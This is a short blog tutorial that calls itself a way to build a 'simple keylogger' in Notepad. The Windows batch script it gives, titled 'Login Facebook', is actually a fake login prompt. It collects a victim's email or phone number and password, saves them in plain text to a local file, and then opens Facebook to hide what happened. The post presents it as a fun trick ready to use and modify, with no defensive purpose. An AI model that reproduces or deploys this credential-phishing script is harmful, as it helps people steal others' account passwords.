Simple Keylogger With Notepad
Hello guys, welcome once more to this amazing tutorial. Today i will be teaching you guys on how to create a simple keylogger with notepad or any text editor of your choice. Before we continue, lets first see what a keylogger is all about.
- What is a keylogger?
Now that we have known what a keylogger is all about, lets move on to the next step which will be the requirements,
- Requirements
- Notepad or any text editor.
- no coding skills needed.
- windows operating system.
- Procedure
- Open notepad and type the following;
- @echo off
- color a
- title Login Facebook
- cls
- echo Please Enter Your E-mail or Phone Number and Password To Login
- echo.
- set /p user=E-mail or Phone Number:
- set /p pass=Password:
- echo Username=”%user%” Password=”%pass%” >> Log.txt
- start https://www.facebook.com
- exit
The Final Output Will Look Like This;
Note:: You can modify the code to suit your taste, it's just a simple trick and it's fun though, ohh i almost forgot Christmas is vast approaching and i wish you guys a Happy Christmas And A Prosperous New Year.
0 $type={blogger}:
Post a Comment